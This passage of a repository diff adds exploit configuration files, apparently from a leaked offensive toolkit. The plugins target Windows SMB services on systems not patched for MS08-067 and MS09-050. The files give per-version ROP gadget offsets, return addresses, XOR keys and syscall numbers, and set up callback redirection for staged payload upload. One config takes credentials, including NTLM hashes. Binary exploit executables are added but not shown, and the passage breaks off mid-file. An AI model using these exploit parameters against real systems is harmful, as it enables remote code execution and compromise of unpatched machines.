<t:parameter name="HeapRetEbxValue" description="" type="U32" value="0x7ffe0300" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
|
||||
|
||||
|
||||
<t:paramchoice name="Target" description="Operating System, Service Pack, and Language of target OS">
|
||||
<t:paramgroup name="W2K" description="Windows 2000 All">
|
||||
<t:parameter name="xor_key_reg" description="" type="U8" value="0x55" hidden="true"/>
|
||||
<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffc17" hidden="true"/>
|
||||
<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff34" hidden="true"/>
|
||||
<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
|
||||
<t:parameter name="CallESP" description="" type="U32" value="0x001f10c8" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
|
||||
<!-- These next 3 are all the same -->
|
||||
<t:paramgroup name="XPSP0" description="Windows XP, Service Pack 0">
|
||||
<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
|
||||
<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
|
||||
<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
|
||||
<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
|
||||
<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="XPSP1" description="Windows XP, Service Pack 1">
|
||||
<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
|
||||
<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
|
||||
<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
|
||||
<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
|
||||
<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="XPSP2" description="Windows XP, Service Pack 2">
|
||||
<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
|
||||
<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x0ffd0000" hidden="true"/>
|
||||
<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x7A31" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CommonRetValue" description="" type="U32" value="0x1095F" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="InitialEcxValue" description="" type="U32" value="0x24588" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0xA08D" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxPtrValue" description="" type="U32" value="0x0ffe131E" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1A5A1" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x1AAD5" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxPtrValue" description="" type="U32" value="0x2458C" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x1E64D" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
|
||||
<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x135BE" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x14D7C" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x24590" hidden="true"/> <!-- offset from base address -->
|
||||
<!-- non-prefix parameters -->
|
||||
<t:parameter name="PtrRet18Value" description="" type="U32" value="0xcc39" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x22064" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2251f" hidden="true"/>
|
||||
<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0xEFDF" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x24588" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CallEcxValue" description="" type="U32" value="0x134B0" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000011" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
|
||||
<!-- 50 c3 -->
|
||||
<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x135cb" hidden="true"/>
|
||||
<!-- 8d 6c 24 10 2b e0 -->
|
||||
<t:parameter name="GetStackPtr" description="" type="U32" value="0x135e8" hidden="true"/>
|
||||
<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x00000089" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="XPSP3" description="Windows XP, Service Pack 3">
|
||||
<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
|
||||
<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x82c9" hidden="true"/>
|
||||
<t:parameter name="CommonRetValue" description="" type="U32" value="0x121de" hidden="true"/>
|
||||
<t:parameter name="InitialEcxValue" description="" type="U32" value="0x32020" hidden="true"/>
|
||||
<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0xA965" hidden="true"/>
|
||||
<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6802c91f" hidden="true"/>
|
||||
<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1fce1" hidden="true"/>
|
||||
<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x20395" hidden="true"/>
|
||||
<t:parameter name="EbxPtrValue" description="" type="U32" value="0x32024" hidden="true"/>
|
||||
<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x24f9b" hidden="true"/>
|
||||
<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
|
||||
<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x14f5e" hidden="true"/>
|
||||
<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x11740" hidden="true"/>
|
||||
<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x32028" hidden="true"/> <!-- offset from base address -->
|
||||
<!-- non-prefix parameters -->
|
||||
<t:parameter name="PtrRet18Value" description="" type="U32" value="0xfe47" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x31486" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2f9f7" hidden="true"/>
|
||||
<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x1006b" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x32020" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CallEcxValue" description="" type="U32" value="0x14e57" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000011" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
|
||||
<!-- 50 c3 -->
|
||||
<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x14f6b" hidden="true"/>
|
||||
<!-- 8d 6c 24 10 2b e0 -->
|
||||
<t:parameter name="GetStackPtr" description="" type="U32" value="0x14f88" hidden="true"/>
|
||||
<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x00000089" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="W2K3SP0" description="Windows 2003, Service Pack 0">
|
||||
<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
|
||||
<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
|
||||
<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
|
||||
<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
|
||||
<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="W2K3SP1" description="Windows 2003, Service Pack 1">
|
||||
<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
|
||||
<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x8430" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CommonRetValue" description="" type="U32" value="0x12ce6" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="InitialEcxValue" description="" type="U32" value="0x2ba08" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0x92a1" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6800cb52" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x21899" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x21dd5" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxPtrValue" description="" type="U32" value="0x2ba0C" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x25a5f" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
|
||||
<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x15ccc" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x63eb" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x2ba10" hidden="true"/> <!-- offset from base address -->
|
||||
<!-- non-prefix parameters -->
|
||||
<t:parameter name="PtrRet18Value" description="" type="U32" value="0xd9f7" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x291c4" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2b34f" hidden="true"/>
|
||||
<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x108f0" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x2ba08" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CallEcxValue" description="" type="U32" value="0x15bb5" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000012" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
|
||||
<!-- 50 c3 -->
|
||||
<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x15cb1" hidden="true"/>
|
||||
<!-- 8d 6c 24 10 2b e0 -->
|
||||
<t:parameter name="GetStackPtr" description="" type="U32" value="0x15cf4" hidden="true"/>
|
||||
<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x0000008f" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="W2K3SP2" description="Windows 2003, Service Pack 2">
|
||||
<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
|
||||
<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x8520" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CommonRetValue" description="" type="U32" value="0x12f87" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="InitialEcxValue" description="" type="U32" value="0x312c0" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0x9391" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6800cc44" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1fbd9" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x202b5" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EbxPtrValue" description="" type="U32" value="0x312c4" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x24e68" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
|
||||
<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x1607c" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x124e3" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x312c8" hidden="true"/> <!-- offset from base address -->
|
||||
<!-- non-prefix parameters -->
|
||||
<t:parameter name="PtrRet18Value" description="" type="U32" value="0x6999" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x3046e" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x30667" hidden="true"/>
|
||||
<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x10b1c" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x312c0" hidden="true"/> <!-- offset from base address -->
|
||||
<t:parameter name="CallEcxValue" description="" type="U32" value="0x15f68" hidden="true"/> <!-- offset from base address -->
|
||||
<!-- 50 c3 -->
|
||||
<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x16061" hidden="true"/>
|
||||
<!-- 8d 6c 24 10 2b e0 -->
|
||||
<t:parameter name="GetStackPtr" description="" type="U32" value="0x160a4" hidden="true"/>
|
||||
<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000012" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
|
||||
<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x0000008f" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:parameter name="Contract"
|
||||
description="Plugin contract"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
<t:paramchoice
|
||||
name="Payload"
|
||||
description="Comms method">
|
||||
<t:paramgroup name="ConnectedSocket" description="traditional">
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to target"
|
||||
type="Socket"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="RPCProxy" description="traditional">
|
||||
<t:parameter name="Protocol"
|
||||
description="Protocol to proxy with"
|
||||
type="String"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
<t:remote protocol="Tcp"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:and>
|
||||
<t:or>
|
||||
<t:service name="smb">
|
||||
<t:bindtovalue name="Protocol" value="SMB"/>
|
||||
<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</t:service>
|
||||
<t:service name="nbt">
|
||||
<t:bindtovalue name="Protocol" value="NBT"/>
|
||||
<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
|
||||
</t:service>
|
||||
</t:or>
|
||||
<t:or>
|
||||
<t:os family="windows" name="Windows 2000">
|
||||
<t:bindtovalue name="Target" value="W2K"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="0">
|
||||
<t:bindtovalue name="Target" value="XPSP0"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="XPSP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="XPSP2"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="3">
|
||||
<t:bindtovalue name="Target" value="XPSP3"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="0">
|
||||
<t:bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</t:os>
|
||||
</t:or>
|
||||
<t:not>
|
||||
<t:os_patch name="MS08-67"/>
|
||||
</t:not>
|
||||
<t:bindtovalue name="Payload" value="Callback"/>
|
||||
</t:and>
|
||||
</t:logic>
|
||||
|
||||
</t:config>
|
||||
BIN
windows/exploits/Eclipsedwing-1.5.2.exe
Normal file
BIN
windows/exploits/Eclipsedwing-1.5.2.exe
Normal file
Binary file not shown.
27
windows/exploits/Educatedscholar-1.0.0.0.fb
Normal file
27
windows/exploits/Educatedscholar-1.0.0.0.fb
Normal file
|
|
@ -0,0 +1,27 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="2207e94cf3dca3559c5711a307a3f84aafa6247c"
|
||||
name="Educatedscholar"
|
||||
version="1.0.0"
|
||||
configversion="1.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Rpctouch"
|
||||
displayname="RPC Touch"
|
||||
postmessage="EDSC requires target OS">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:iparam name="Protocol" value="SMB"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="Protocol" value="Protocol"/>
|
||||
</t:plugin>
|
||||
<t:plugin name="Educatedscholartouch"
|
||||
displayname="EDSC Vulnerability Touch"
|
||||
postmessage="EDSC exploits a public vulnerability">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="Protocol" value="Protocol"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
149
windows/exploits/Educatedscholar-1.0.0.0.xml
Normal file
149
windows/exploits/Educatedscholar-1.0.0.0.xml
Normal file
|
|
@ -0,0 +1,149 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="2207e94cf3dca3559c5711a307a3f84aafa6247c"
|
||||
name="Educatedscholar"
|
||||
version="1.0.0"
|
||||
configversion="1.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:inputparameters>
|
||||
<t:parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"
|
||||
binding="//identifier"/>
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by SMB"
|
||||
type="TcpPort"
|
||||
binding="//service[name='smb']/port"/>
|
||||
|
||||
<t:parameter name="CallbackIp"
|
||||
description="Callback IP Address"
|
||||
type="IPv4"/>
|
||||
<t:parameter name="CallbackPort"
|
||||
description="Callback port"
|
||||
type="TcpPort"
|
||||
default="0"/>
|
||||
<t:parameter name="CallbackLocalPort"
|
||||
description="Local callback port"
|
||||
type="TcpPort"
|
||||
required="false"/>
|
||||
<t:parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16"
|
||||
default="60"/>
|
||||
<t:parameter name="PacketDelay"
|
||||
description="Milliseconds for delay between memory write packets"
|
||||
type="U16"
|
||||
hidden="true"
|
||||
value="150"/>
|
||||
|
||||
<!-- Need to differentiate between x86 and 64bit -->
|
||||
<t:paramchoice name="Target" description="Target OS Version">
|
||||
<t:paramgroup name="VistaSP1" description="">
|
||||
<t:parameter name="ProcessIDHigh" description="" type="U16"
|
||||
value="0x01BB" hidden="true"/>
|
||||
<t:parameter name="ReturnAddress" description="" type="U32"
|
||||
value="0xffdf0908" hidden="true"/>
|
||||
<t:parameter name="HeaderWriteOffset" description="" type="U32"
|
||||
value="0x3fffffe6" hidden="true"/>
|
||||
<t:parameter name="ReadWriteAddress" description="" type="U32"
|
||||
value="0xffdf0d04" hidden="true"/>
|
||||
<t:parameter name="SetBitAddress" description="" type="U32"
|
||||
value="0xffdf0770" hidden="true"/>
|
||||
<t:parameter name="ReadAddress" description="" type="U32"
|
||||
value="0xffdf02f4" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="VistaSP2" description="">
|
||||
<t:parameter name="ProcessIDHigh" description="" type="U16"
|
||||
value="0x01BB" hidden="true"/>
|
||||
<t:parameter name="ReturnAddress" description="" type="U32"
|
||||
value="0xffdf0908" hidden="true"/>
|
||||
<t:parameter name="HeaderWriteOffset" description="" type="U32"
|
||||
value="0x3fffffe7" hidden="true"/>
|
||||
<t:parameter name="ReadWriteAddress" description="" type="U32"
|
||||
value="0xffdf0d04" hidden="true"/>
|
||||
<t:parameter name="SetBitAddress" description="" type="U32"
|
||||
value="0xffdf0770" hidden="true"/>
|
||||
<t:parameter name="ReadAddress" description="" type="U32"
|
||||
value="0xffdf02f4" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="2K8SP1" description="">
|
||||
<t:parameter name="ProcessIDHigh" description="" type="U16"
|
||||
value="0x01BB" hidden="true"/>
|
||||
<t:parameter name="ReturnAddress" description="" type="U32"
|
||||
value="0xffdf0908" hidden="true"/>
|
||||
<t:parameter name="HeaderWriteOffset" description="" type="U32"
|
||||
value="0x3fffffe6" hidden="true"/>
|
||||
<t:parameter name="ReadWriteAddress" description="" type="U32"
|
||||
value="0xffdf0d04" hidden="true"/>
|
||||
<t:parameter name="SetBitAddress" description="" type="U32"
|
||||
value="0xffdf0770" hidden="true"/>
|
||||
<t:parameter name="ReadAddress" description="" type="U32"
|
||||
value="0xffdf02f4" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="2K8SP2" description="">
|
||||
<t:parameter name="ProcessIDHigh" description="" type="U16"
|
||||
value="0x01BB" hidden="true"/>
|
||||
<t:parameter name="ReturnAddress" description="" type="U32"
|
||||
value="0xffdf0908" hidden="true"/>
|
||||
<t:parameter name="HeaderWriteOffset" description="" type="U32"
|
||||
value="0x3fffffe7" hidden="true"/>
|
||||
<t:parameter name="ReadWriteAddress" description="" type="U32"
|
||||
value="0xffdf0d04" hidden="true"/>
|
||||
<t:parameter name="SetBitAddress" description="" type="U32"
|
||||
value="0xffdf0770" hidden="true"/>
|
||||
<t:parameter name="ReadAddress" description="" type="U32"
|
||||
value="0xffdf02f4" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
|
||||
</t:inputparameters>
|
||||
<t:outputparameters>
|
||||
<t:parameter name="Contract"
|
||||
description="The contract fulfilled by this plugin"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to target"
|
||||
type="Socket"/>
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
|
||||
</t:outputparameters>
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='smb']/port"
|
||||
closeoncompletion="true"/>
|
||||
<t:remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</t:redirection>
|
||||
<t:logic>
|
||||
<t:and>
|
||||
<t:service name="smb">
|
||||
<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</t:service>
|
||||
<t:or>
|
||||
<t:os family="windows" name="Windows Vista" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="VistaSP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows Vista" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="VistaSP2"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2008" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="2K8SP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2008" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="2K8SP2"/>
|
||||
</t:os>
|
||||
</t:or>
|
||||
<t:not>
|
||||
<t:os_patch name="MS09-050"/>
|
||||
</t:not>
|
||||
</t:and>
|
||||
</t:logic>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Educatedscholar-1.0.0.exe
Normal file
BIN
windows/exploits/Educatedscholar-1.0.0.exe
Normal file
Binary file not shown.
20
windows/exploits/Emeraldthread-3.0.0.0.fb
Normal file
20
windows/exploits/Emeraldthread-3.0.0.0.fb
Normal file
|
|
@ -0,0 +1,20 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
|
||||
name="Emeraldthread"
|
||||
version="3.0.0"
|
||||
configversion="3.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Emeraldthreadtouch"
|
||||
displayname="Emeraldthread Touch"
|
||||
description="Touch to get Target Printer"
|
||||
postmessage="EMTH requires Printer name">
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="Protocol" value="Protocol"/>
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="Credentials" value="Credentials"/>
|
||||
<t:oparam name="PrinterName" value="PrinterName"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
240
windows/exploits/Emeraldthread-3.0.0.0.xml
Normal file
240
windows/exploits/Emeraldthread-3.0.0.0.xml
Normal file
|
|
@ -0,0 +1,240 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
|
||||
name="Emeraldthread"
|
||||
version="3.0.0"
|
||||
configversion="3.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:inputparameters>
|
||||
<t:parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16"
|
||||
default="60" />
|
||||
<t:parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"
|
||||
binding="//identifier"/>
|
||||
<t:paramchoice name="Protocol"
|
||||
default="SMB"
|
||||
description="Protocol to connect to target with">
|
||||
<t:paramgroup name="SMB"
|
||||
description="SMB over TCP">
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by SMB"
|
||||
type="TcpPort"
|
||||
default="445"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="NBT"
|
||||
description="Netbios over TCP">
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by Netbios"
|
||||
type="TcpPort"
|
||||
default="139"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:paramchoice name="Credentials"
|
||||
description="Type of credentials to use">
|
||||
<t:paramgroup name="Anonymous"
|
||||
description="Anonymous (NULL session)"/>
|
||||
<t:paramgroup name="Guest"
|
||||
description="Guest account"/>
|
||||
<t:paramgroup name="No password"
|
||||
description="User account with no password set">
|
||||
<t:parameter name="Username"
|
||||
description=""
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Password"
|
||||
description="Username and password">
|
||||
<t:parameter name="Username"
|
||||
description=""
|
||||
type="UString"/>
|
||||
<t:parameter name="Password"
|
||||
description=""
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="NTLM hash"
|
||||
description="Username and NTLM hash">
|
||||
<t:parameter name="Username"
|
||||
description=""
|
||||
type="UString"/>
|
||||
<t:parameter name="NTLMHash"
|
||||
description="NTLM password hash (in hex)"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Both hashes"
|
||||
description="Username, NTLM hash, and LANMAN hash">
|
||||
<t:parameter name="Username"
|
||||
description=""
|
||||
type="UString"/>
|
||||
<t:parameter name="NTLMHash"
|
||||
description="NTLM password hash (in hex)"
|
||||
type="UString"/>
|
||||
<t:parameter name="LANMANHash"
|
||||
description="LANMAN password hash (in hex)"
|
||||
